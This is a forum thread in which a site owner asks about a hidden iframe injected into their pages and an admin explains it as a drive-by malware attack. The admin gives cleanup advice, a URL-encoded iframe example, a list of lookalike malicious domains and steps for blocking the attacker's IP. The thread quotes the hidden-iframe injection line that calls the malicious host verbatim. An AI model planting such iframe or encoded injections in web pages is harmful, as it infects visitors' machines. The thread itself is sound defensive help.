[semaphoreseo]

echo "<iframe src=\"http://thedeadpit.com/?click=4859468\" width=1 height=1 style=\"visibility:hidden;position:absolute\"></iframe>";

a script is coming in my site as echo "<iframe src=\"http://thedeadpit.com/?click=4859468

i want to know what is this??

[Admin]

It's injecting Malware in to your site, and attempting to infect every visitor that views your web page by pulling code through the iFrame from their server to your visitors browser. You really need to remove it ASAP, otherwise it will infect people and Google will label your site as Malware.

After your remove it, update all your scripts powering your site to the latest versions, check your filesystem for any files which don't belong there or that have been modified recently. Also scan your database any see if any malicious code is in there also.

Now here's the thing, there is a good chance this thing has infected your PC and "sniffed" your FTP username and password to your server. Which means even if you update your scripts, simply logging on to FTP will transmit your pass and it will infect you again. Changing your FTP password obviously won't help because the new one will be sent again when logging on to FTP.

So.. You need to scan your PC with a number of Virus and Malware scanners because often these loggers on your PC are ahead of the game and hard to detect.

First up, i recommend a full system scan with Malware Bytes Anti-Malware they have a free version and it's very sensitive, plus does a brilliant job of removal.

Also, the iFrame in your page may be encoded and look something similar to the below code:

Code:

<script type="text/javascript">
<!--
document.write(unescape('%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%74%61%72%65%65%69%6E%74%65%72%6E%65%74%2E%63%6F%6D%22%3E%3C%2F%69%66%72%61%6D%65%3E'));
//-->
</script>

If so we have built a decoder that decodes it back in to a readable domain name. Just paste the code in our Unescape Decoder and Encoder tool and hit decode. The above decodes to a harmless iFrame with the Taree Internet URL:

Code:

<script type="text/javascript">
<!--
document.write(unescape('<iframe src="http://tareeinternet.com"></iframe>'));
//-->
</script>

Edit: 12th April 2009

Just a small update, there's a number of other domains popped up that are involved with an almost identical iFrame exploit. The tips in the post also apply to the new domains, and the same conditions apply this exploit is most likely on your PC and is sending out your FTP details every time you connect.

Domains:

goooogleadsence.biz
google-ana1yticz.com
googleabsence.biz
hyperliteautoservices.cn
mediahousenameshopfilm.cn

As you can see with the first 3 domains, they are intentionally trying to look like a valid Google service. This list is by no means complete, domains are under $10 and it's nothing for the people doing these iFrame exploits to register 100 at a time.

[Admin]

I noticed since posting this thread it's had about 1,000 hits so thedeadpit.com has obviously infected a lot of people and i see the domain is still active. So i just thought i'd add this bit of info, which will also help prevent more users being infected.

You can block your server from making a connection with his, this is something you can do even if you haven't been hit with the Malware as a precaution if you want to.

Most websites use cPanel as a control panel, so login to cPanel and click the "IP Deny Manager" icon which looks something like this:



Then enter the the IP 89.41.131.143 like so and click Add:



That's it, your server will now block connections with his and prevent the malicious downloader from being fetched off his server when either you or a visitor loads your page.

Likewise if you are a visitor who doesn't own a website, but received a pop-up or notification when browsing about Thedeadpit.com you can add this IP to your PC's Firewall and block all In & Outbound connections from the IP.

But please note, you still need to follow the steps in my first post and do full system scans and take measures to remove it completely. Blocking the IP will just halt the malicious activity so it doesn't infect more people, steal your passwords or reinfect you or your sites files while you are removing it. Also as protection if your page gets injected with the code, it won't connect to the Trojan downloader and propagate.